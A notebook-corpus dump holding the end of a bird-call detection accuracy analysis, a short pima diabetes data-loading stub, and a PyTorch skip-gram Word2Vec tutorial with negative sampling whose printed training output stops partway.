unit_best_trials = best_trials[test_unit_id, -5:]\n unit_best_trials = sorted(unit_best_trials)\n trial_id = unit_best_trials[eval_trial_id]\n\n cv_fn = cv_fn + model_report[\"test_cv-acc_th=0.5\"][\"FN\"][test_unit_id, trial_id]\n cv_fp = cv_fp + model_report[\"test_cv-acc_th=0.5\"][\"FP\"][test_unit_id, trial_id]\n cv_tn = cv_tn + model_report[\"test_cv-acc_th=0.5\"][\"TN\"][test_unit_id, trial_id]\n cv_tp = cv_tp + model_report[\"test_cv-acc_th=0.5\"][\"TP\"][test_unit_id, trial_id]\n\n cv_acc = (cv_tn+cv_tp) / (cv_tn+cv_tp+cv_fn+cv_fp)\n cv_accs.append(cv_acc)\n\n \n model_report[\"test_cv-acc_th=0.5\"][\"global_acc\"] = np.array(cv_accs)\n report[model_name] = model_report\n \n print(model_name, \": acc = {:5.2f}% ± {:3.1f}\".format(\n 100*np.mean(report[model_name]['test_cv-acc_th=0.5']['global_acc']),\n 100*np.std(report[model_name]['test_cv-acc_th=0.5']['global_acc'])))\n \n \n#print(report['icassp-convnet_aug-all']['test_cv-acc_th=0.5']['global_acc'])\n#print(report['pcen-add-convnet_aug-all-but-noise']['test_cv-acc_th=0.5']['global_acc'])", "icassp-convnet : acc = 85.25% ± 5.8\nicassp-convnet_aug-all-but-noise : acc = 84.71% ± 7.5\nicassp-convnet_aug-all : acc = 94.85% ± 0.8\nicassp-ntt-convnet : acc = 83.77% ± 7.8\nicassp-ntt-convnet_aug-all-but-noise : acc = 80.94% ± 7.3\nicassp-ntt-convnet_aug-all : acc = 89.68% ± 5.8\npcen-convnet : acc = 73.29% ± 4.5\npcen-convnet_aug-all-but-noise : acc = 62.21% ± 3.9\npcen-convnet_aug-all : acc = 82.46% ± 11.0\nicassp-add-convnet : acc = 71.36% ± 
11.5\nicassp-add-convnet_aug-all-but-noise : acc = 78.84% ± 10.5\nicassp-add-convnet_aug-all : acc = 75.24% ± 6.5\npcen-add-convnet : acc = 93.15% ± 2.7\npcen-add-convnet_aug-all-but-noise : acc = 95.82% ± 0.5\npcen-add-convnet_aug-all : acc = 74.17% ± 4.9\npcen-ntt-convnet_aug-all-but-noise : acc = 91.82% ± 4.5\npcen-ntt-convnet_aug-all : acc = 69.24% ± 7.2\npcen-addntt-convnet_aug-all-but-noise : acc = 74.82% ± 13.4\n" ], [ "list(report.keys())", "_____no_output_____" ], [ "icassp_accs = report['icassp-convnet_aug-all']['test_cv-acc_th=0.5']['global_acc']\nprint(\"ICASSP 2018: acc = {:5.2f}% ± {:3.1f}\".format(100*np.mean(icassp_accs), 100*np.std(icassp_accs)))\n\nspl_accs = report['pcen-add-convnet_aug-all-but-noise']['test_cv-acc_th=0.5']['global_acc']\nprint(\"SPL 2018: acc = {:5.2f}% ± {:3.1f}\".format(100*np.mean(spl_accs), 100*np.std(spl_accs)))", "ICASSP 2018: acc = 94.85% ± 0.8\nSPL 2018: acc = 95.82% ± 0.5\n" ], [ "n_trials = 5\nmodel_name = \"skm-cv\"\nmodel_dir = os.path.join(models_dir, model_name)\n\n\nskm_fns = np.zeros((n_trials, n_units))\nskm_fps = np.zeros((n_trials, n_units))\nskm_tns = np.zeros((n_trials, n_units))\nskm_tps = np.zeros((n_trials, n_units))\n\n\n# Loop over trials.\nfor trial_id in range(n_trials):\n\n \n # Loop over units.\n for test_unit_id, test_unit_str in enumerate(units):\n\n # Define path to predictions.\n unit_dir = os.path.join(model_dir, test_unit_str)\n trial_str = \"trial-\" + str(5 + trial_id)\n trial_dir = os.path.join(unit_dir, trial_str)\n predictions_name = \"_\".join([\n dataset_name,\n \"skm-proba\",\n \"test-\" + test_unit_str,\n trial_str,\n \"predict-\" + test_unit_str,\n \"clip-predictions.csv\"\n ])\n predictions_path = os.path.join(trial_dir, predictions_name)\n\n # Remove header, which has too few columns (hack).\n with open(predictions_path, 'r') as f:\n reader = csv.reader(f)\n rows = list(reader)\n rows = [\",\".join(row) for row in rows]\n rows = rows[1:]\n rows = \"\\n\".join(rows)\n\n # Parse rows with correct header.\n df = pd.read_csv(StringIO(rows),\n names=[\n \"Dataset\",\n \"Test unit\",\n \"Prediction unit\",\n \"Timestamp\",\n \"Center Freq (Hz)\",\n \"Augmentation\",\n \"Key\",\n \"Ground truth\",\n \"Predicted probability\"])\n \n # Extract y_pred and y_true.\n y_pred = np.array((df[\"Predicted probability\"] > 0.5)).astype(\"int\")\n y_true = np.array(df[\"Ground truth\"])\n\n # Compute confusion matrix.\n test_tn, test_fp, test_fn, test_tp =\\\n sklearn.metrics.confusion_matrix(\n y_true, y_pred).ravel()\n \n skm_fns[trial_id, test_unit_id] = test_fn\n skm_fps[trial_id, test_unit_id] = test_fp\n skm_tns[trial_id, test_unit_id] = test_tn\n skm_tps[trial_id, test_unit_id] = test_tp\n \n \ntotal_skm_fns = np.sum(skm_fns[:, 1:], axis=1)\ntotal_skm_fps = np.sum(skm_fps[:, 1:], axis=1)\ntotal_skm_tns = np.sum(skm_tns[:, 1:], axis=1)\ntotal_skm_tps = np.sum(skm_tps[:, 1:], axis=1)\n\ntotal_skm_accs = (total_skm_tns+total_skm_tps) / (total_skm_fns+total_skm_fps+total_skm_tns+total_skm_tps)\nprint(\"SKM: acc = {:5.2f}% ± {:3.1f}\".format(100*np.mean(total_skm_accs), 100*np.std(total_skm_accs)))", "SKM: acc = 87.77% ± 0.4\n" ], [ "xticks = np.array([2.0, 5.0, 10.0, 20.0, 50.0])\nlms_snr_accs = np.repeat([0.652], 5)\npcen_snr_accs = np.repeat([0.809], 5)\nskm_accs = total_skm_accs\n\nfig, ax = plt.subplots(figsize=(10, 3))\nplt.rcdefaults()\nplt.boxplot(np.log2(np.array([\n 100*(1-lms_snr_accs),\n 100*(1-pcen_snr_accs),\n 100*(1-skm_accs),\n 100*(1-icassp_accs),\n 100*(1-spl_accs)]).T), 0, 'rs', 0,\n whis=100000, 
patch_artist=True, boxprops={\"facecolor\": \"w\"});\nplt.xlim(np.log2(np.array([2.0, 50.0])))\nplt.xticks(np.log2(xticks))\nplt.gca().set_xticklabels([100 - x for x in xticks])\n\nplt.setp(ax.get_yticklabels(), family=\"serif\")\nax.set_yticklabels([\"logmelspec-SNR\", \"PCEN-SNR\", \"PCA-SKM-CNN\", \"logmelspec-CNN\", \"BirdVoxDetect\"],\n family=\"serif\")\nplt.gca().invert_yaxis()\nplt.gca().invert_xaxis()\n\nplt.xlabel(\"Test accuracy (%)\", family=\"serif\")\nplt.gca().yaxis.grid(color='k', linestyle='--', linewidth=1.0, alpha=0.25, which=\"major\")\nplt.gca().xaxis.grid(color='k', linestyle='--', linewidth=1.0, alpha=0.25, which=\"major\")\n\nplt.savefig('fig_per-fold-test.eps', bbox_inches=\"tight\")", "_____no_output_____" ], [ "\n", "_____no_output_____" ], [ "np.min(icassp_accs), np.max(icassp_accs)", "_____no_output_____" ], [ "np.min(spl_accs), np.max(spl_accs)", "_____no_output_____" ], [ "\nicassp_fold_accs = report['icassp-convnet_aug-all']['validation'][\"accuracy\"]\nspl_fold_accs = report['pcen-add-convnet_aug-all-but-noise']['validation'][\"accuracy\"]\nprint(np.mean(np.max(icassp_fold_accs, axis=1)), np.mean(np.max(spl_fold_accs, axis=1)))", "0.954919296987 0.964616622329\n" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ] ]
cb1c306ca06fb47dabd14c90e822357cee4e826b
16,104
ipynb
Jupyter Notebook
Logestic regression model.ipynb
phani-1995/Datascience
715268cb3634c75b621d57ac9557c6ec49e8e235
[ "MIT" ]
null
null
null
Logestic regression model.ipynb
phani-1995/Datascience
715268cb3634c75b621d57ac9557c6ec49e8e235
[ "MIT" ]
null
null
null
Logestic regression model.ipynb
phani-1995/Datascience
715268cb3634c75b621d57ac9557c6ec49e8e235
[ "MIT" ]
null
null
null
28.912029
127
0.286575
[ [ [ "import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n%matplotlib inline\nimport seaborn as sn", "_____no_output_____" ], [ "pima = pd.read_csv(\"D:\\\\projects\\\\Classifications model\\\\Linear Logistic model\\\\diabetes.csv\", header= None)\npima", "_____no_output_____" ], [ "pima.head()", "_____no_output_____" ], [ "pima.describe()", "_____no_output_____" ], [ "pima.corr()", "_____no_output_____" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code" ] ]
cb1c314b26ef0c2cc5f780f802891dc6c65ea2ad
679,122
ipynb
Jupyter Notebook
word2vec-embeddings/Negative_Sampling_Exercise.ipynb
sonalagrawal7/DeepLearning-nanodegree-exercises
1d4c939d95024cd1a9b3cf23d129b2e262bce097
[ "MIT" ]
3
2021-03-12T12:59:31.000Z
2021-03-16T17:11:39.000Z
word2vec-embeddings/Negative_Sampling_Exercise.ipynb
sonalagrawal7/DeepLearning-nanodegree-exercises
1d4c939d95024cd1a9b3cf23d129b2e262bce097
[ "MIT" ]
null
null
null
word2vec-embeddings/Negative_Sampling_Exercise.ipynb
sonalagrawal7/DeepLearning-nanodegree-exercises
1d4c939d95024cd1a9b3cf23d129b2e262bce097
[ "MIT" ]
null
null
null
600.461538
629,776
0.937867
[ [ [ "# Skip-gram Word2Vec\n\nIn this notebook, I'll lead you through using PyTorch to implement the [Word2Vec algorithm](https://en.wikipedia.org/wiki/Word2vec) using the skip-gram architecture. By implementing this, you'll learn about embedding words for use in natural language processing. This will come in handy when dealing with things like machine translation.\n\n## Readings\n\nHere are the resources I used to build this notebook. I suggest reading these either beforehand or while you're working on this material.\n\n* A really good [conceptual overview](http://mccormickml.com/2016/04/19/word2vec-tutorial-the-skip-gram-model/) of Word2Vec from Chris McCormick \n* [First Word2Vec paper](https://arxiv.org/pdf/1301.3781.pdf) from Mikolov et al.\n* [Neural Information Processing Systems, paper](http://papers.nips.cc/paper/5021-distributed-representations-of-words-and-phrases-and-their-compositionality.pdf) with improvements for Word2Vec also from Mikolov et al.\n\n---\n## Word embeddings\n\nWhen you're dealing with words in text, you end up with tens of thousands of word classes to analyze; one for each word in a vocabulary. Trying to one-hot encode these words is massively inefficient because most values in a one-hot vector will be set to zero. So, the matrix multiplication that happens in between a one-hot input vector and a first, hidden layer will result in mostly zero-valued hidden outputs.\n\nTo solve this problem and greatly increase the efficiency of our networks, we use what are called **embeddings**. Embeddings are just a fully connected layer like you've seen before. We call this layer the embedding layer and the weights are embedding weights. We skip the multiplication into the embedding layer by instead directly grabbing the hidden layer values from the weight matrix. We can do this because the multiplication of a one-hot encoded vector with a matrix returns the row of the matrix corresponding the index of the \"on\" input unit.\n\n<img src='assets/lookup_matrix.png' width=50%>\n\nInstead of doing the matrix multiplication, we use the weight matrix as a lookup table. We encode the words as integers, for example \"heart\" is encoded as 958, \"mind\" as 18094. Then to get hidden layer values for \"heart\", you just take the 958th row of the embedding matrix. This process is called an **embedding lookup** and the number of hidden units is the **embedding dimension**.\n \nThere is nothing magical going on here. The embedding lookup table is just a weight matrix. The embedding layer is just a hidden layer. The lookup is just a shortcut for the matrix multiplication. The lookup table is trained just like any weight matrix.\n\nEmbeddings aren't only used for words of course. You can use them for any model where you have a massive number of classes. A particular type of model called **Word2Vec** uses the embedding layer to find vector representations of words that contain semantic meaning.", "_____no_output_____" ], [ "---\n## Word2Vec\n\nThe Word2Vec algorithm finds much more efficient representations by finding vectors that represent the words. These vectors also contain semantic information about the words.\n\n<img src=\"assets/context_drink.png\" width=40%>\n\nWords that show up in similar **contexts**, such as \"coffee\", \"tea\", and \"water\" will have vectors near each other. 
Different words will be further away from one another, and relationships can be represented by distance in vector space.\n\n\nThere are two architectures for implementing Word2Vec:\n>* CBOW (Continuous Bag-Of-Words) and \n* Skip-gram\n\n<img src=\"assets/word2vec_architectures.png\" width=60%>\n\nIn this implementation, we'll be using the **skip-gram architecture** with **negative sampling** because it performs better than CBOW and trains faster with negative sampling. Here, we pass in a word and try to predict the words surrounding it in the text. In this way, we can train the network to learn representations for words that show up in similar contexts.", "_____no_output_____" ], [ "---\n## Loading Data\n\nNext, we'll ask you to load in data and place it in the `data` directory\n\n1. Load the [text8 dataset](https://s3.amazonaws.com/video.udacity-data.com/topher/2018/October/5bbe6499_text8/text8.zip); a file of cleaned up *Wikipedia article text* from Matt Mahoney. \n2. Place that data in the `data` folder in the home directory.\n3. Then you can extract it and delete the archive, zip file to save storage space.\n\nAfter following these steps, you should have one file in your data directory: `data/text8`.", "_____no_output_____" ] ], [ [ "# read in the extracted text file \nwith open('data/text8') as f:\n text = f.read()\n\n# print out the first 100 characters\nprint(text[:100])", " anarchism originated as a term of abuse first used against early working class radicals including t\n" ] ], [ [ "## Pre-processing\n\nHere I'm fixing up the text to make training easier. This comes from the `utils.py` file. The `preprocess` function does a few things:\n>* It converts any punctuation into tokens, so a period is changed to ` <PERIOD> `. In this data set, there aren't any periods, but it will help in other NLP problems. \n* It removes all words that show up five or *fewer* times in the dataset. This will greatly reduce issues due to noise in the data and improve the quality of the vector representations. \n* It returns a list of words in the text.\n\nThis may take a few seconds to run, since our text file is quite large. If you want to write your own functions for this stuff, go for it!", "_____no_output_____" ] ], [ [ "import utils\n\n# get list of words\nwords = utils.preprocess(text)\nprint(words[:30])", "['anarchism', 'originated', 'as', 'a', 'term', 'of', 'abuse', 'first', 'used', 'against', 'early', 'working', 'class', 'radicals', 'including', 'the', 'diggers', 'of', 'the', 'english', 'revolution', 'and', 'the', 'sans', 'culottes', 'of', 'the', 'french', 'revolution', 'whilst']\n" ], [ "# print some stats about this word data\nprint(\"Total words in text: {}\".format(len(words)))\nprint(\"Unique words: {}\".format(len(set(words)))) # `set` removes any duplicate words", "Total words in text: 16680599\nUnique words: 63641\n" ] ], [ [ "### Dictionaries\n\nNext, I'm creating two dictionaries to convert words to integers and back again (integers to words). This is again done with a function in the `utils.py` file. `create_lookup_tables` takes in a list of words in a text and returns two dictionaries.\n>* The integers are assigned in descending frequency order, so the most frequent word (\"the\") is given the integer 0 and the next most frequent is 1, and so on. 
\n\nOnce we have our dictionaries, the words are converted to integers and stored in the list `int_words`.", "_____no_output_____" ] ], [ [ "vocab_to_int, int_to_vocab = utils.create_lookup_tables(words)\nint_words = [vocab_to_int[word] for word in words]\n\nprint(int_words[:30])", "[5233, 3080, 11, 5, 194, 1, 3133, 45, 58, 155, 127, 741, 476, 10571, 133, 0, 27349, 1, 0, 102, 854, 2, 0, 15067, 58112, 1, 0, 150, 854, 3580]\n" ] ], [ [ "## Subsampling\n\nWords that show up often such as \"the\", \"of\", and \"for\" don't provide much context to the nearby words. If we discard some of them, we can remove some of the noise from our data and in return get faster training and better representations. This process is called subsampling by Mikolov. For each word $w_i$ in the training set, we'll discard it with probability given by \n\n$$ P(w_i) = 1 - \\sqrt{\\frac{t}{f(w_i)}} $$\n\nwhere $t$ is a threshold parameter and $f(w_i)$ is the frequency of word $w_i$ in the total dataset.\n\n> Implement subsampling for the words in `int_words`. That is, go through `int_words` and discard each word given the probablility $P(w_i)$ shown above. Note that $P(w_i)$ is the probability that a word is discarded. Assign the subsampled data to `train_words`.", "_____no_output_____" ] ], [ [ "from collections import Counter\nimport random\nimport numpy as np\n\nthreshold = 1e-5\nword_counts = Counter(int_words)\n#print(list(word_counts.items())[0]) # dictionary of int_words, how many times they appear\n\ntotal_count = len(int_words)\nfreqs = {word: count/total_count for word, count in word_counts.items()}\np_drop = {word: 1 - np.sqrt(threshold/freqs[word]) for word in word_counts}\n# discard some frequent words, according to the subsampling equation\n# create a new list of words for training\ntrain_words = [word for word in int_words if random.random() < (1 - p_drop[word])]\n\nprint(train_words[:30])", "[5233, 3133, 476, 10571, 27349, 102, 15067, 58112, 3580, 10712, 371, 26, 1423, 2757, 5233, 44611, 792, 186, 5233, 8983, 4147, 6437, 4186, 5233, 344, 6753, 7573, 1774, 11064, 7088]\n" ] ], [ [ "## Making batches", "_____no_output_____" ], [ "Now that our data is in good shape, we need to get it into the proper form to pass it into our network. With the skip-gram architecture, for each word in the text, we want to define a surrounding _context_ and grab all the words in a window around that word, with size $C$. \n\nFrom [Mikolov et al.](https://arxiv.org/pdf/1301.3781.pdf): \n\n\"Since the more distant words are usually less related to the current word than those close to it, we give less weight to the distant words by sampling less from those words in our training examples... If we choose $C = 5$, for each training word we will select randomly a number $R$ in range $[ 1: C ]$, and then use $R$ words from history and $R$ words from the future of the current word as correct labels.\"\n\n> **Exercise:** Implement a function `get_target` that receives a list of words, an index, and a window size, then returns a list of words in the window around the index. 
Make sure to use the algorithm described above, where you chose a random number of words to from the window.\n\nSay, we have an input and we're interested in the idx=2 token, `741`: \n```\n[5233, 58, 741, 10571, 27349, 0, 15067, 58112, 3580, 58, 10712]\n```\n\nFor `R=2`, `get_target` should return a list of four values:\n```\n[5233, 58, 10571, 27349]\n```", "_____no_output_____" ] ], [ [ "def get_target(words, idx, window_size=5):\n ''' Get a list of words in a window around an index. '''\n \n R = np.random.randint(1, window_size+1)\n start = idx - R if (idx - R) > 0 else 0\n stop = idx + R\n target_words = words[start:idx] + words[idx+1:stop+1]\n \n return list(target_words)", "_____no_output_____" ], [ "# test your code!\n\n# run this cell multiple times to check for random window selection\nint_text = [i for i in range(10)]\nprint('Input: ', int_text)\nidx=5 # word index of interest\n\ntarget = get_target(int_text, idx=idx, window_size=5)\nprint('Target: ', target) # you should get some indices around the idx", "Input: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\nTarget: [4, 6]\n" ] ], [ [ "### Generating Batches \n\nHere's a generator function that returns batches of input and target data for our model, using the `get_target` function from above. The idea is that it grabs `batch_size` words from a words list. Then for each of those batches, it gets the target words in a window.", "_____no_output_____" ] ], [ [ "def get_batches(words, batch_size, window_size=5):\n ''' Create a generator of word batches as a tuple (inputs, targets) '''\n \n n_batches = len(words)//batch_size\n \n # only full batches\n words = words[:n_batches*batch_size]\n \n for idx in range(0, len(words), batch_size):\n x, y = [], []\n batch = words[idx:idx+batch_size]\n for ii in range(len(batch)):\n batch_x = batch[ii]\n batch_y = get_target(batch, ii, window_size)\n y.extend(batch_y)\n x.extend([batch_x]*len(batch_y))\n yield x, y\n ", "_____no_output_____" ], [ "int_text = [i for i in range(20)]\nx,y = next(get_batches(int_text, batch_size=4, window_size=5))\n\nprint('x\\n', x)\nprint('y\\n', y)", "x\n [0, 1, 1, 1, 2, 2, 2, 3, 3, 3]\ny\n [1, 0, 2, 3, 0, 1, 3, 0, 1, 2]\n" ] ], [ [ "---\n## Validation\n\nHere, I'm creating a function that will help us observe our model as it learns. We're going to choose a few common words and few uncommon words. Then, we'll print out the closest words to them using the cosine similarity: \n\n<img src=\"assets/two_vectors.png\" width=30%>\n\n$$\n\\mathrm{similarity} = \\cos(\\theta) = \\frac{\\vec{a} \\cdot \\vec{b}}{|\\vec{a}||\\vec{b}|}\n$$\n\n\nWe can encode the validation words as vectors $\\vec{a}$ using the embedding table, then calculate the similarity with each word vector $\\vec{b}$ in the embedding table. With the similarities, we can print out the validation words and words in our embedding table semantically similar to those words. It's a nice way to check that our embedding table is grouping together words with similar semantic meanings.", "_____no_output_____" ] ], [ [ "def cosine_similarity(embedding, valid_size=16, valid_window=100, device='cpu'):\n \"\"\" Returns the cosine similarity of validation words with words in the embedding matrix.\n Here, embedding should be a PyTorch embedding module.\n \"\"\"\n \n # Here we're calculating the cosine similarity between some random words and \n # our embedding vectors. With the similarities, we can look at what words are\n # close to our random words.\n \n # sim = (a . 
b) / |a||b|\n \n embed_vectors = embedding.weight\n \n # magnitude of embedding vectors, |b|\n magnitudes = embed_vectors.pow(2).sum(dim=1).sqrt().unsqueeze(0)\n \n # pick N words from our ranges (0,window) and (1000,1000+window). lower id implies more frequent \n valid_examples = np.array(random.sample(range(valid_window), valid_size//2))\n valid_examples = np.append(valid_examples,\n random.sample(range(1000,1000+valid_window), valid_size//2))\n valid_examples = torch.LongTensor(valid_examples).to(device)\n \n valid_vectors = embedding(valid_examples)\n similarities = torch.mm(valid_vectors, embed_vectors.t())/magnitudes\n \n return valid_examples, similarities", "_____no_output_____" ] ], [ [ "---\n# SkipGram model\n\nDefine and train the SkipGram model. \n> You'll need to define an [embedding layer](https://pytorch.org/docs/stable/nn.html#embedding) and a final, softmax output layer.\n\nAn Embedding layer takes in a number of inputs, importantly:\n* **num_embeddings** – the size of the dictionary of embeddings, or how many rows you'll want in the embedding weight matrix\n* **embedding_dim** – the size of each embedding vector; the embedding dimension\n\nBelow is an approximate diagram of the general structure of our network.\n<img src=\"assets/skip_gram_arch.png\" width=60%>\n\n>* The input words are passed in as batches of input word tokens. \n* This will go into a hidden layer of linear units (our embedding layer). \n* Then, finally into a softmax output layer. \n\nWe'll use the softmax layer to make a prediction about the context words by sampling, as usual.", "_____no_output_____" ], [ "---\n## Negative Sampling\n\nFor every example we give the network, we train it using the output from the softmax layer. That means for each input, we're making very small changes to millions of weights even though we only have one true example. This makes training the network very inefficient. We can approximate the loss from the softmax layer by only updating a small subset of all the weights at once. We'll update the weights for the correct example, but only a small number of incorrect, or noise, examples. This is called [\"negative sampling\"](http://papers.nips.cc/paper/5021-distributed-representations-of-words-and-phrases-and-their-compositionality.pdf). \n\nThere are two modifications we need to make. First, since we're not taking the softmax output over all the words, we're really only concerned with one output word at a time. Similar to how we use an embedding table to map the input word to the hidden layer, we can now use another embedding table to map the hidden layer to the output word. Now we have two embedding layers, one for input words and one for output words. Secondly, we use a modified loss function where we only care about the true example and a small subset of noise examples.\n\n$$\n- \\large \\log{\\sigma\\left(u_{w_O}\\hspace{0.001em}^\\top v_{w_I}\\right)} -\n\\sum_i^N \\mathbb{E}_{w_i \\sim P_n(w)}\\log{\\sigma\\left(-u_{w_i}\\hspace{0.001em}^\\top v_{w_I}\\right)}\n$$\n\nThis is a little complicated so I'll go through it bit by bit. $u_{w_O}\\hspace{0.001em}^\\top$ is the embedding vector for our \"output\" target word (transposed, that's the $^\\top$ symbol) and $v_{w_I}$ is the embedding vector for the \"input\" word. Then the first term \n\n$$\\large \\log{\\sigma\\left(u_{w_O}\\hspace{0.001em}^\\top v_{w_I}\\right)}$$\n\nsays we take the log-sigmoid of the inner product of the output word vector and the input word vector. 
Now the second term, let's first look at \n\n$$\\large \\sum_i^N \\mathbb{E}_{w_i \\sim P_n(w)}$$ \n\nThis means we're going to take a sum over words $w_i$ drawn from a noise distribution $w_i \\sim P_n(w)$. The noise distribution is basically our vocabulary of words that aren't in the context of our input word. In effect, we can randomly sample words from our vocabulary to get these words. $P_n(w)$ is an arbitrary probability distribution though, which means we get to decide how to weight the words that we're sampling. This could be a uniform distribution, where we sample all words with equal probability. Or it could be according to the frequency that each word shows up in our text corpus, the unigram distribution $U(w)$. The authors found the best distribution to be $U(w)^{3/4}$, empirically. \n\nFinally, in \n\n$$\\large \\log{\\sigma\\left(-u_{w_i}\\hspace{0.001em}^\\top v_{w_I}\\right)},$$ \n\nwe take the log-sigmoid of the negated inner product of a noise vector with the input vector. \n\n<img src=\"assets/neg_sampling_loss.png\" width=50%>\n\nTo give you an intuition for what we're doing here, remember that the sigmoid function returns a probability between 0 and 1. The first term in the loss pushes the probability that our network will predict the correct word $w_O$ towards 1. In the second term, since we are negating the sigmoid input, we're pushing the probabilities of the noise words towards 0.", "_____no_output_____" ] ], [ [ "import torch\nfrom torch import nn\nimport torch.optim as optim", "_____no_output_____" ], [ "class SkipGramNeg(nn.Module):\n def __init__(self, n_vocab, n_embed, noise_dist=None):\n super().__init__()\n \n self.n_vocab = n_vocab\n self.n_embed = n_embed\n self.noise_dist = noise_dist\n \n # define embedding layers for input and output words\n self.in_embed = nn.Embedding(n_vocab,n_embed)\n self.out_embed = nn.Embedding(n_vocab,n_embed)\n \n # Initialize both embedding tables with uniform distribution\n self.in_embed.weight.data.uniform_(1,-1)\n self.out_embed.weight.data.uniform_(1,-1)\n \n def forward_input(self, input_words):\n # return input vector embeddings\n input_vector = self.in_embed(input_words)\n\n return input_vector\n \n def forward_output(self, output_words):\n # return output vector embeddings\n output_vector = self.out_embed(output_words)\n\n return output_vector\n \n def forward_noise(self, batch_size, n_samples):\n \"\"\" Generate noise vectors with shape (batch_size, n_samples, n_embed)\"\"\"\n if self.noise_dist is None:\n # Sample words uniformly\n noise_dist = torch.ones(self.n_vocab)\n else:\n noise_dist = self.noise_dist\n \n # Sample words from our noise distribution\n noise_words = torch.multinomial(noise_dist,\n batch_size * n_samples,\n replacement=True)\n \n device = \"cuda\" if model.out_embed.weight.is_cuda else \"cpu\"\n noise_words = noise_words.to(device)\n \n ## TODO: get the noise embeddings\n # reshape the embeddings so that they have dims (batch_size, n_samples, n_embed)\n noise_vector = self.out_embed(noise_words)\n noise_vector = noise_vector.view(batch_size, n_samples, self.n_embed)\n\n \n return noise_vector", "_____no_output_____" ], [ "class NegativeSamplingLoss(nn.Module):\n def __init__(self):\n super().__init__()\n\n def forward(self, input_vectors, output_vectors, noise_vectors):\n \n batch_size, embed_size = input_vectors.shape\n \n # Input vectors should be a batch of column vectors\n input_vectors = input_vectors.view(batch_size, embed_size, 1)\n \n # Output vectors should be a batch of row vectors\n 
output_vectors = output_vectors.view(batch_size, 1, embed_size)\n \n # bmm = batch matrix multiplication\n # correct log-sigmoid loss\n out_loss = torch.bmm(output_vectors, input_vectors).sigmoid().log()\n out_loss = out_loss.squeeze()\n \n # incorrect log-sigmoid loss\n noise_loss = torch.bmm(noise_vectors.neg(), input_vectors).sigmoid().log()\n noise_loss = noise_loss.squeeze().sum(1) # sum the losses over the sample of noise vectors\n\n # negate and sum correct and noisy log-sigmoid losses\n # return average batch loss\n return -(out_loss + noise_loss).mean()", "_____no_output_____" ] ], [ [ "### Training\n\nBelow is our training loop, and I recommend that you train on GPU, if available.", "_____no_output_____" ] ], [ [ "device = 'cuda' if torch.cuda.is_available() else 'cpu'\n\n# Get our noise distribution\n# Using word frequencies calculated earlier in the notebook\nword_freqs = np.array(sorted(freqs.values(), reverse=True))\nunigram_dist = word_freqs/word_freqs.sum()\nnoise_dist = torch.from_numpy(unigram_dist**(0.75)/np.sum(unigram_dist**(0.75)))\n\n# instantiating the model\nembedding_dim = 300\nmodel = SkipGramNeg(len(vocab_to_int), embedding_dim, noise_dist=noise_dist).to(device)\n\n# using the loss that we defined\ncriterion = NegativeSamplingLoss() \noptimizer = optim.Adam(model.parameters(), lr=0.003)\n\nprint_every = 1500\nsteps = 0\nepochs = 3\n\n# train for some number of epochs\nfor e in range(epochs):\n \n # get our input, target batches\n for input_words, target_words in get_batches(train_words, 512):\n steps += 1\n inputs, targets = torch.LongTensor(input_words), torch.LongTensor(target_words)\n inputs, targets = inputs.to(device), targets.to(device)\n \n # input, outpt, and noise vectors\n input_vectors = model.forward_input(inputs)\n output_vectors = model.forward_output(targets)\n noise_vectors = model.forward_noise(inputs.shape[0], 5)\n\n # negative sampling loss\n loss = criterion(input_vectors, output_vectors, noise_vectors)\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n # loss stats\n if steps % print_every == 0:\n print(\"Epoch: {}/{}\".format(e+1, epochs))\n print(\"Loss: \", loss.item()) # avg batch loss at this point in training\n valid_examples, valid_similarities = cosine_similarity(model.in_embed, device=device)\n _, closest_idxs = valid_similarities.topk(6)\n\n valid_examples, closest_idxs = valid_examples.to('cpu'), closest_idxs.to('cpu')\n for ii, valid_idx in enumerate(valid_examples):\n closest_words = [int_to_vocab[idx.item()] for idx in closest_idxs[ii]][1:]\n print(int_to_vocab[valid_idx.item()] + \" | \" + ', '.join(closest_words))\n print(\"...\\n\")", "Epoch: 1/3\nLoss: 6.543435573577881\nbut | angel, democratic, some, eagles, unrest\nafter | upgrades, the, yau, sam, commissioning\none | the, and, six, british, four\nyears | forum, afro, stole, guardian, called\nnot | oldest, arizona, vdash, freshwater, of\nsuch | painter, regardless, creature, uc, jews\nwhen | lukoff, japan, translations, angels, casinos\nbetween | the, us, sayed, annexation, fighters\nalternative | storing, faure, melon, rock, anti\negypt | stabilize, bulb, staphylococcus, casablanca, olive\ngrand | brattain, player, vocation, platinum, arexx\ninstance | improvement, autumnal, belgian, visigoths, lio\nsmith | paying, thousands, decimus, involved, parchamis\nconstruction | evil, sarcastically, antiphon, tomatoes, masami\nunits | phrase, tetra, exploitation, funds, homosexuals\ndiscovered | conducting, irene, railcar, tap, akademie\n...\n\nEpoch: 1/3\nLoss: 
4.900622367858887\nthere | of, with, to, a, unitarian\nfor | of, the, a, that, and\nhas | zero, a, with, the, is\nwith | to, in, of, zero, a\nwill | or, hexadecimal, one, examples, analogs\nthree | the, and, one, two, zero\nthis | the, in, that, and, to\nabout | zero, seven, two, he, and\nmainly | a, carboxylate, futures, parenthesis, marginal\nbible | conversion, banjos, taut, assamese, refute\nshown | bolivia, cryptography, valve, zur, likewise\nfile | deporting, vince, intrinsically, fifty, elucidate\nknow | boron, bosnians, wasted, traverse, for\ninstance | and, riddler, improvement, question, malaise\nfrac | beethoven, elric, inflicting, of, umayyad\nliberal | agrarian, november, central, moods, stages\n...\n\nEpoch: 1/3\nLoss: 4.091379165649414\nbut | the, is, this, that, be\ninto | it, of, with, be, to\ni | to, his, one, s, it\non | a, to, and, the, for\ncalled | of, in, for, is, an\nworld | nine, four, eight, have, one\nwhile | are, to, or, that, painted\nmay | of, in, the, to, a\ncost | pliocene, benelux, tenji, staffed, make\nmarriage | instead, nonmetallic, of, angelo, the\nmean | more, capone, outs, originator, heizei\nreport | country, subhas, cauchy, inscrutable, partnered\narticles | of, all, lookout, ozzy, fickle\naccepted | shofar, ear, word, popularly, quantized\npope | urbanisation, create, sitting, soil, lender\nunits | deutschland, tetra, exploitation, womanhood, disputing\n...\n\nEpoch: 1/3\nLoss: 3.7220635414123535\nother | a, by, of, to, are\nwar | of, france, united, seven, 